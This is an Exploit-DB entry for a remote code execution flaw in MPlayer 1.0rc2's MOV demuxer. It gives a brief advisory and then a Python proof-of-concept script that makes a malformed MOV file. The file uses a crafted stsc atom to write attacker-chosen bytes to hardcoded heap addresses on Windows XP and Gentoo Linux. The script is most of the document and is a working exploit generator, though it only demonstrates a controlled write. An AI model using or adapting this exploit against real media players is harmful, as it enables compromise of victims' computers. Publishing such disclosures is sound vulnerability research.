MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution

EDB-ID:

31076




Platform:

Linux

Date:

2008-02-04


source: https://www.securityfocus.com/bid/27499/info

MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory.

An attacker can exploit this issue to execute arbitrary code, which can result in the complete compromise of the computer. Failed exploit attempts will result in a denial-of-service condition.

This issue affects MPlayer 1.0rc2; other versions may also be affected. 

#!/bin/python

import struct
import sys

def mkatom(type,data):
     if len(type) != 4:
         raise "type must by of length 4!!!"
     mov = ""
     mov += struct.pack(">L",len(data)+8)
     mov += type
     mov += data
     return mov

def poc(address, block_size):

     what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk
     base= ((address - 8) / block_size) +1

     ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1")
     mdat = mkatom("mdat","MALDAAAAAD!")
     stsc  = mkatom("stsc",struct.pack(">L",1) + \
                     struct.pack(">L",2) + \
                     struct.pack(">L",base) + \
                     what + \
                     struct.pack(">L",base+300)+what)
     trak = mkatom("trak",stsc)
     moov = mkatom("moov",trak)

     file = ftyp + mdat + moov
     return file

try:
     if sys.argv[2] != "linux":
         evilness = poc(0x0122e000, 24)     #Windows XP SP2 Prof. ES
     else:
         evilness = poc(0x088aa020, 20)     #Linux Gentoo

     print "[+] Generating file: %s" % sys.argv[1]
     file = open(sys.argv[1], "wb")
     file.write(evilness)
     file.close()
     print "[+] Done."

except Exception, e:
     print "[+] Usage: python mplayer_poc.py filename.mov windows (For
WinXP Prof SP2 ES)"
     print "           python mplayer_poc.py filename.mov linux     (For
Linux Gentoo)"